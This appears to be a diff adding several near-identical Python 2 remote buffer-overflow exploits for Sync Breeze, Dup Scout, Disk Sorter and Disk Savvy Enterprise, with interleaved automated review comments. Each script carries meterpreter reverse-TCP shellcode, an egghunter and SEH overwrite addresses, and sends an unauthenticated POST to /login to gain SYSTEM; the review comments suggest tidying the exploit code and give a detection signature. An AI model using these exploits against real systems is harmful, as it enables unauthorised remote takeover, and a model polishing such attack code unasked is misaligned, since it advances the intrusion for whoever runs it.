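+#pop pop ret 100159be
+
+nseh = "\x90\x90\xEB\x0B"
+seh = "\xbe\x59\x01\x10"
+
+egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
+egghunter += "\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
+
+
+evil = "POST /login HTTP/1.1\r\n"
+evil += "Host: 192.168.123.132\r\n"
+evil += "User-Agent: Mozilla/5.0\r\n"
+evil += "Connection: close\r\n"
+evil += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
+evil += "Accept-Language: en-us,en;q=0.5\r\n"
+evil += "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
+evil += "Keep-Alive: 300\r\n"
+evil += "Proxy-Connection: keep-alive\r\n"
+evil += "Content-Type: application/x-www-form-urlencoded\r\n"
+evil += "Content-Length: 17000\r\n\r\n"
+evil += "username=admin"
+evil += "&password=aaaaa\r\n"
+evil += "\x41" * 12292 #subtract/add for payload
+evil += "w00tw00t"
+evil += "\x90" * 20
+evil += buf
+evil += "\x90" * 50
+evil += "\x42" * 1614
+evil += nseh
+evil += seh
+evil += "\x90" * 20
+evil += egghunter
+evil += "\x90" * 7000
+
+print 'Sending evil buffer...'
+s.send(evil)
+print 'Payload Sent!'
+s.close()
+
+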
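Review bot: `import sys` is never used, and `connect=s.connect(('192.168.123.132',80))` binds the `None` that `socket.connect` returns, so `connect` is a dead name; `s.connect(('192.168.123.132',80))` on its own says the same thing. The target address is written twice, in that call and again in the `Host:` header, while the header comment tells the reader to "Swop out IP" ("Swap"); keeping it in a single module-level name prevents the two from drifting apart when one is edited. For defenders, the request shape this script emits is distinctive and easy to signature in web-server or IDS logs: a POST to `/login` with a declared Content-Length of 17000 and a body containing the fixed `w00tw00t` marker, which the sibling Sync Breeze script (40456.py) reuses verbatim.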
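--- a/platforms/windows/remote/40456.py
+++ b/platforms/windows/remote/40456.py
@@ -0,0 +1,93 @@
+#!/usr/bin/python
+
+print "Sync Breeze Enterprise 8.9.24 Buffer Overflow Exploit"
+print "Author: Tulpa / tulpa[at]tulpa-security[dot]com"
+
+#Author website: www.tulpa-security.com
+#Author twitter: @tulpa_security
+
+#Exploit will land you NT AUTHORITY\SYSTEM
+#You do not need to be authenticated, password below is garbage
+#Swop out IP, shellcode and remember to adjust '\x41' for bytes
+#Tested on Windows 7 x86 Enterprise SP1
+
+#Greetings to ozzie_offsec and carbonated
+
+import socket
+import sys
+
+s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
+connect=s.connect(('192.168.123.132',80))
+
+#bad chars \x00\x0a\x0d\x26
+
+#msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.123.128 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\x0d\x26' -f python --smallest
+
+#payload size 308
+
+buf = ""
+buf += "\xda\xd9\xba\x43\x1b\x3f\x40\xd9\x74\x24\xf4\x58\x2b"
+buf += "\xc9\xb1\x47\x31\x50\x18\x03\x50\x18\x83\xc0\x47\xf9"
+buf += "\xca\xbc\xaf\x7f\x34\x3d\x2f\xe0\xbc\xd8\x1e\x20\xda"
+buf += "\xa9\x30\x90\xa8\xfc\xbc\x5b\xfc\x14\x37\x29\x29\x1a"
+buf += "\xf0\x84\x0f\x15\x01\xb4\x6c\x34\x81\xc7\xa0\x96\xb8"
+buf += "\x07\xb5\xd7\xfd\x7a\x34\x85\x56\xf0\xeb\x3a\xd3\x4c"
+buf += "\x30\xb0\xaf\x41\x30\x25\x67\x63\x11\xf8\xfc\x3a\xb1"
+buf += "\xfa\xd1\x36\xf8\xe4\x36\x72\xb2\x9f\x8c\x08\x45\x76"
+buf += "\xdd\xf1\xea\xb7\xd2\x03\xf2\xf0\xd4\xfb\x81\x08\x27"
+buf += "\x81\x91\xce\x5a\x5d\x17\xd5\xfc\x16\x8f\x31\xfd\xfb"
+buf += "\x56\xb1\xf1\xb0\x1d\x9d\x15\x46\xf1\x95\x21\xc3\xf4"
+buf += "\x79\xa0\x97\xd2\x5d\xe9\x4c\x7a\xc7\x57\x22\x83\x17"
+buf += "\x38\x9b\x21\x53\xd4\xc8\x5b\x3e\xb0\x3d\x56\xc1\x40"
+buf += "\x2a\xe1\xb2\x72\xf5\x59\x5d\x3e\x7e\x44\x9a\x41\x55"
+buf += "\x30\x34\xbc\x56\x41\x1c\x7a\x02\x11\x36\xab\x2b\xfa"
+buf += "\xc6\x54\xfe\x97\xc3\xc2\xc1\xc0\xb7\x92\xaa\x12\x48"
+buf += "\x83\x76\x9a\xae\xf3\xd6\xcc\x7e\xb3\x86\xac\x2e\x5b"
+buf += "\xcd\x22\x10\x7b\xee\xe8\x39\x11\x01\x45\x11\x8d\xb8"
+buf += "\xcc\xe9\x2c\x44\xdb\x97\x6e\xce\xe8\x68\x20\x27\x84"
+buf += "\x7a\xd4\xc7\xd3\x21\x72\xd7\xc9\x4c\x7a\x4d\xf6\xc6"
+buf += "\x2d\xf9\xf4\x3f\x19\xa6\x07\x6a\x12\x6f\x92\xd5\x4c"
+buf += "\x90\x72\xd6\x8c\xc6\x18\xd6\xe4\xbe\x78\x85\x11\xc1"
+buf += "\x54\xb9\x8a\x54\x57\xe8\x7f\xfe\x3f\x16\xa6\xc8\x9f"
+buf += "\xe9\x8d\xc8\xdc\x3f\xeb\xbe\x0c\xfc"
+
+#pop pop ret 10030991
+
+nseh = "\x90\x90\xEB\x0B"
+seh = "\x91\x09\x03\x10"
+
+egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
+egghunter += "\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
+
+
+evil = "POST /login HTTP/1.1\r\n"
+evil += "Host: 192.168.123.132\r\n"
+evil += "User-Agent: Mozilla/5.0\r\n"
+evil += "Connection: close\r\n"
+evil += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
+evil += "Accept-Language: en-us,en;q=0.5\r\n"
+evil += "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
+evil += "Keep-Alive: 300\r\n"
+evil += "Proxy-Connection: keep-alive\r\n"
+evil += "Content-Type: application/x-www-form-urlencoded\r\n"
+evil += "Content-Length: 17000\r\n\r\n"
+evil += "username=admin"
+evil += "&password=aaaaa\r\n"
+evil += "\x41" * 12292 #subtract/add for payload
+evil += "w00tw00t"
+evil += "\x90" * 20
+evil += buf
+evil += "\x90" * 50
+evil += "\x42" * 1614
+evil += nseh
+evil += seh
+evil += "\x90" * 20
+evil += egghunter
+evil += "\x90" * 7000
+
+print 'Sending evil buffer...'
+s.send(evil)
+print 'Payload Sent!'
+s.close()
+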
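Review bot: `import sys` is never used and `connect=s.connect(('192.168.123.132',80))` binds the `None` that `socket.connect` returns, so `connect` is a dead name; a bare `s.connect(('192.168.123.132',80))` says the same thing. The script is also Python 2 only (`print` statements, `str` buffers handed to `s.send`), which the header block does not state; a line such as `#Python 2 only: print statements and str-typed socket buffers` next to `#Tested on Windows 7 x86 Enterprise SP1` would spare a reader a failed run under Python 3. The same two points apply to 40457.py, 40458.py and 40459.py, which are identical to this file apart from the banner, the `#pop pop ret` address and the `seh` bytes.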
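--- a/platforms/windows/remote/40457.py
+++ b/platforms/windows/remote/40457.py
@@ -0,0 +1,93 @@
+#!/usr/bin/python
+
+print "Dup Scout Enterprise 9.0.28 Buffer Overflow Exploit"
+print "Author: Tulpa / tulpa[at]tulpa-security[dot]com"
+
+#Author website: www.tulpa-security.com
+#Author twitter: @tulpa_security
+
+#Exploit will land you NT AUTHORITY\SYSTEM
+#You do not need to be authenticated, password below is garbage
+#Swop out IP, shellcode and remember to adjust '\x41' for bytes
+#Tested on Windows 7 x86 Enterprise SP1
+
+#Shout-out to carbonated and ozzie_offsec
+
+import socket
+import sys
+
+s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
+connect=s.connect(('192.168.123.132',80))
+
+#bad chars \x00\x0a\x0d\x26
+
+#msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.123.128 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\x0d\x26' -f python --smallest
+
+#payload size 308
+
+buf = ""
+buf += "\xda\xd9\xba\x43\x1b\x3f\x40\xd9\x74\x24\xf4\x58\x2b"
+buf += "\xc9\xb1\x47\x31\x50\x18\x03\x50\x18\x83\xc0\x47\xf9"
+buf += "\xca\xbc\xaf\x7f\x34\x3d\x2f\xe0\xbc\xd8\x1e\x20\xda"
+buf += "\xa9\x30\x90\xa8\xfc\xbc\x5b\xfc\x14\x37\x29\x29\x1a"
+buf += "\xf0\x84\x0f\x15\x01\xb4\x6c\x34\x81\xc7\xa0\x96\xb8"
+buf += "\x07\xb5\xd7\xfd\x7a\x34\x85\x56\xf0\xeb\x3a\xd3\x4c"
+buf += "\x30\xb0\xaf\x41\x30\x25\x67\x63\x11\xf8\xfc\x3a\xb1"
+buf += "\xfa\xd1\x36\xf8\xe4\x36\x72\xb2\x9f\x8c\x08\x45\x76"
+buf += "\xdd\xf1\xea\xb7\xd2\x03\xf2\xf0\xd4\xfb\x81\x08\x27"
+buf += "\x81\x91\xce\x5a\x5d\x17\xd5\xfc\x16\x8f\x31\xfd\xfb"
+buf += "\x56\xb1\xf1\xb0\x1d\x9d\x15\x46\xf1\x95\x21\xc3\xf4"
+buf += "\x79\xa0\x97\xd2\x5d\xe9\x4c\x7a\xc7\x57\x22\x83\x17"
+buf += "\x38\x9b\x21\x53\xd4\xc8\x5b\x3e\xb0\x3d\x56\xc1\x40"
+buf += "\x2a\xe1\xb2\x72\xf5\x59\x5d\x3e\x7e\x44\x9a\x41\x55"
+buf += "\x30\x34\xbc\x56\x41\x1c\x7a\x02\x11\x36\xab\x2b\xfa"
+buf += "\xc6\x54\xfe\x97\xc3\xc2\xc1\xc0\xb7\x92\xaa\x12\x48"
+buf += "\x83\x76\x9a\xae\xf3\xd6\xcc\x7e\xb3\x86\xac\x2e\x5b"
+buf += "\xcd\x22\x10\x7b\xee\xe8\x39\x11\x01\x45\x11\x8d\xb8"
+buf += "\xcc\xe9\x2c\x44\xdb\x97\x6e\xce\xe8\x68\x20\x27\x84"
+buf += "\x7a\xd4\xc7\xd3\x21\x72\xd7\xc9\x4c\x7a\x4d\xf6\xc6"
+buf += "\x2d\xf9\xf4\x3f\x19\xa6\x07\x6a\x12\x6f\x92\xd5\x4c"
+buf += "\x90\x72\xd6\x8c\xc6\x18\xd6\xe4\xbe\x78\x85\x11\xc1"
+buf += "\x54\xb9\x8a\x54\x57\xe8\x7f\xfe\x3f\x16\xa6\xc8\x9f"
+buf += "\xe9\x8d\xc8\xdc\x3f\xeb\xbe\x0c\xfc"
+
+#pop pop ret 1006cd33
+
+nseh = "\x90\x90\xEB\x0B"
+seh = "\x33\xcd\x06\x10"
+
+egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
+egghunter += "\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
+
+
+evil = "POST /login HTTP/1.1\r\n"
+evil += "Host: 192.168.123.132\r\n"
+evil += "User-Agent: Mozilla/5.0\r\n"
+evil += "Connection: close\r\n"
+evil += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
+evil += "Accept-Language: en-us,en;q=0.5\r\n"
+evil += "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
+evil += "Keep-Alive: 300\r\n"
+evil += "Proxy-Connection: keep-alive\r\n"
+evil += "Content-Type: application/x-www-form-urlencoded\r\n"
+evil += "Content-Length: 17000\r\n\r\n"
+evil += "username=admin"
+evil += "&password=aaaaa\r\n"
+evil += "\x41" * 12292 #subtract/add for payload
+evil += "w00tw00t"
+evil += "\x90" * 20
+evil += buf
+evil += "\x90" * 50
+evil += "\x42" * 1614
+evil += nseh
+evil += seh
+evil += "\x90" * 20
+evil += egghunter
+evil += "\x90" * 7000
+
+print 'Sending evil buffer...'
+s.send(evil)
+print 'Payload Sent!'
+s.close()
+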
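--- a/platforms/windows/remote/40458.py
+++ b/platforms/windows/remote/40458.py
@@ -0,0 +1,93 @@
+#!/usr/bin/python
+
+print "Disk Sorter Enterprise 9.0.24 Buffer Overflow Exploit"
+print "Author: Tulpa / tulpa[at]tulpa-security[dot]com"
+
+#Author website: www.tulpa-security.com
+#Author twitter: @tulpa_security
+
+#Exploit will land you NT AUTHORITY\SYSTEM
+#You do not need to be authenticated, password below is garbage
+#Swop out IP, shellcode and remember to adjust '\x41' for bytes
+#Tested on Windows 7 x86 Enterprise SP1
+
+#Shout-out to ozzie_offsec and carbonated
+
+import socket
+import sys
+
+s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
+connect=s.connect(('192.168.123.132',80))
+
+#bad chars \x00\x0a\x0d\x26
+
+#msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.123.128 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\x0d\x26' -f python --smallest
+
+#payload size 308
+
+buf = ""
+buf += "\xda\xd9\xba\x43\x1b\x3f\x40\xd9\x74\x24\xf4\x58\x2b"
+buf += "\xc9\xb1\x47\x31\x50\x18\x03\x50\x18\x83\xc0\x47\xf9"
+buf += "\xca\xbc\xaf\x7f\x34\x3d\x2f\xe0\xbc\xd8\x1e\x20\xda"
+buf += "\xa9\x30\x90\xa8\xfc\xbc\x5b\xfc\x14\x37\x29\x29\x1a"
+buf += "\xf0\x84\x0f\x15\x01\xb4\x6c\x34\x81\xc7\xa0\x96\xb8"
+buf += "\x07\xb5\xd7\xfd\x7a\x34\x85\x56\xf0\xeb\x3a\xd3\x4c"
+buf += "\x30\xb0\xaf\x41\x30\x25\x67\x63\x11\xf8\xfc\x3a\xb1"
+buf += "\xfa\xd1\x36\xf8\xe4\x36\x72\xb2\x9f\x8c\x08\x45\x76"
+buf += "\xdd\xf1\xea\xb7\xd2\x03\xf2\xf0\xd4\xfb\x81\x08\x27"
+buf += "\x81\x91\xce\x5a\x5d\x17\xd5\xfc\x16\x8f\x31\xfd\xfb"
+buf += "\x56\xb1\xf1\xb0\x1d\x9d\x15\x46\xf1\x95\x21\xc3\xf4"
+buf += "\x79\xa0\x97\xd2\x5d\xe9\x4c\x7a\xc7\x57\x22\x83\x17"
+buf += "\x38\x9b\x21\x53\xd4\xc8\x5b\x3e\xb0\x3d\x56\xc1\x40"
+buf += "\x2a\xe1\xb2\x72\xf5\x59\x5d\x3e\x7e\x44\x9a\x41\x55"
+buf += "\x30\x34\xbc\x56\x41\x1c\x7a\x02\x11\x36\xab\x2b\xfa"
+buf += "\xc6\x54\xfe\x97\xc3\xc2\xc1\xc0\xb7\x92\xaa\x12\x48"
+buf += "\x83\x76\x9a\xae\xf3\xd6\xcc\x7e\xb3\x86\xac\x2e\x5b"
+buf += "\xcd\x22\x10\x7b\xee\xe8\x39\x11\x01\x45\x11\x8d\xb8"
+buf += "\xcc\xe9\x2c\x44\xdb\x97\x6e\xce\xe8\x68\x20\x27\x84"
+buf += "\x7a\xd4\xc7\xd3\x21\x72\xd7\xc9\x4c\x7a\x4d\xf6\xc6"
+buf += "\x2d\xf9\xf4\x3f\x19\xa6\x07\x6a\x12\x6f\x92\xd5\x4c"
+buf += "\x90\x72\xd6\x8c\xc6\x18\xd6\xe4\xbe\x78\x85\x11\xc1"
+buf += "\x54\xb9\x8a\x54\x57\xe8\x7f\xfe\x3f\x16\xa6\xc8\x9f"
+buf += "\xe9\x8d\xc8\xdc\x3f\xeb\xbe\x0c\xfc"
+
+#pop pop ret 10048d36
+
+nseh = "\x90\x90\xEB\x0B"
+seh = "\x36\x8d\x04\x10"
+
+egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
+egghunter += "\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
+
+
+evil = "POST /login HTTP/1.1\r\n"
+evil += "Host: 192.168.123.132\r\n"
+evil += "User-Agent: Mozilla/5.0\r\n"
+evil += "Connection: close\r\n"
+evil += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
+evil += "Accept-Language: en-us,en;q=0.5\r\n"
+evil += "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
+evil += "Keep-Alive: 300\r\n"
+evil += "Proxy-Connection: keep-alive\r\n"
+evil += "Content-Type: application/x-www-form-urlencoded\r\n"
+evil += "Content-Length: 17000\r\n\r\n"
+evil += "username=admin"
+evil += "&password=aaaaa\r\n"
+evil += "\x41" * 12292 #subtract/add for payload
+evil += "w00tw00t"
+evil += "\x90" * 20
+evil += buf
+evil += "\x90" * 50
+evil += "\x42" * 1614
+evil += nseh
+evil += seh
+evil += "\x90" * 20
+evil += egghunter
+evil += "\x90" * 7000
+
+print 'Sending evil buffer...'
+s.send(evil)
+print 'Payload Sent!'
+s.close()
+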
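--- a/platforms/windows/remote/40459.py
+++ b/platforms/windows/remote/40459.py
@@ -0,0 +1,93 @@
+#!/usr/bin/python
+
+print "Disk Savvy Enterprise 9.0.32 Buffer Overflow Exploit"
+print "Author: Tulpa / tulpa[at]tulpa-security[dot]com"
+
+#Author website: www.tulpa-security.com
+#Author twitter: @tulpa_security
+
+#Exploit will land you NT AUTHORITY\SYSTEM
+#You do not need to be authenticated, password below is garbage
+#Swop out IP, shellcode and remember to adjust '\x41' for bytes
+#Tested on Windows 7 x86 Enterprise SP1
+
+#Shout-out to carbonated and ozzie_offsec
+
+import socket
+import sys
+
+s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
+connect=s.connect(('192.168.123.132',80))
+
+#bad chars \x00\x0a\x0d\x26
+
+#msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.123.128 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\x0d\x26' -f python --smallest
+
+#payload size 308
+
+buf = ""
+buf += "\xda\xd9\xba\x43\x1b\x3f\x40\xd9\x74\x24\xf4\x58\x2b"
+buf += "\xc9\xb1\x47\x31\x50\x18\x03\x50\x18\x83\xc0\x47\xf9"
+buf += "\xca\xbc\xaf\x7f\x34\x3d\x2f\xe0\xbc\xd8\x1e\x20\xda"
+buf += "\xa9\x30\x90\xa8\xfc\xbc\x5b\xfc\x14\x37\x29\x29\x1a"
+buf += "\xf0\x84\x0f\x15\x01\xb4\x6c\x34\x81\xc7\xa0\x96\xb8"
+buf += "\x07\xb5\xd7\xfd\x7a\x34\x85\x56\xf0\xeb\x3a\xd3\x4c"
+buf += "\x30\xb0\xaf\x41\x30\x25\x67\x63\x11\xf8\xfc\x3a\xb1"
+buf += "\xfa\xd1\x36\xf8\xe4\x36\x72\xb2\x9f\x8c\x08\x45\x76"
+buf += "\xdd\xf1\xea\xb7\xd2\x03\xf2\xf0\xd4\xfb\x81\x08\x27"
+buf += "\x81\x91\xce\x5a\x5d\x17\xd5\xfc\x16\x8f\x31\xfd\xfb"
+buf += "\x56\xb1\xf1\xb0\x1d\x9d\x15\x46\xf1\x95\x21\xc3\xf4"
+buf += "\x79\xa0\x97\xd2\x5d\xe9\x4c\x7a\xc7\x57\x22\x83\x17"
+buf += "\x38\x9b\x21\x53\xd4\xc8\x5b\x3e\xb0\x3d\x56\xc1\x40"
+buf += "\x2a\xe1\xb2\x72\xf5\x59\x5d\x3e\x7e\x44\x9a\x41\x55"
+buf += "\x30\x34\xbc\x56\x41\x1c\x7a\x02\x11\x36\xab\x2b\xfa"
+buf += "\xc6\x54\xfe\x97\xc3\xc2\xc1\xc0\xb7\x92\xaa\x12\x48"
+buf += "\x83\x76\x9a\xae\xf3\xd6\xcc\x7e\xb3\x86\xac\x2e\x5b"
+buf += "\xcd\x22\x10\x7b\xee\xe8\x39\x11\x01\x45\x11\x8d\xb8"
+buf += "\xcc\xe9\x2c\x44\xdb\x97\x6e\xce\xe8\x68\x20\x27\x84"
+buf += "\x7a\xd4\xc7\xd3\x21\x72\xd7\xc9\x4c\x7a\x4d\xf6\xc6"
+buf += "\x2d\xf9\xf4\x3f\x19\xa6\x07\x6a\x12\x6f\x92\xd5\x4c"
+buf += "\x90\x72\xd6\x8c\xc6\x18\xd6\xe4\xbe\x78\x85\x11\xc1"
+buf += "\x54\xb9\x8a\x54\x57\xe8\x7f\xfe\x3f\x16\xa6\xc8\x9f"
+buf += "\xe9\x8d\xc8\xdc\x3f\xeb\xbe\x0c\xfc"
+
+#pop pop ret 10076451
+
+nseh = "\x90\x90\xEB\x0B"
+seh = "\x51\x64\x07\x10"
+
+egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
+egghunter += "\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
+
+
+evil = "POST /login HTTP/1.1\r\n"
+evil += "Host: 192.168.123.132\r\n"
+evil += "User-Agent: Mozilla/5.0\r\n"
+evil += "Connection: close\r\n"
+evil += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
+evil += "Accept-Language: en-us,en;q=0.5\r\n"
+evil += "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
+evil += "Keep-Alive: 300\r\n"
+evil += "Proxy-Connection: keep-alive\r\n"
+evil += "Content-Type: application/x-www-form-urlencoded\r\n"
+evil += "Content-Length: 17000\r\n\r\n"
+evil += "username=admin"
+evil += "&password=aaaaa\r\n"
+evil += "\x41" * 12292 #subtract/add for payload
+evil += "w00tw00t"
+evil += "\x90" * 20
+evil += buf
+evil += "\x90" * 50
+evil += "\x42" * 1614
+evil += nseh
+evil += seh
+evil += "\x90" * 20
+evil += egghunter
+evil += "\x90" * 7000
+
+print 'Sending evil buffer...'
+s.send(evil)
+print 'Payload Sent!'
+s.close()
+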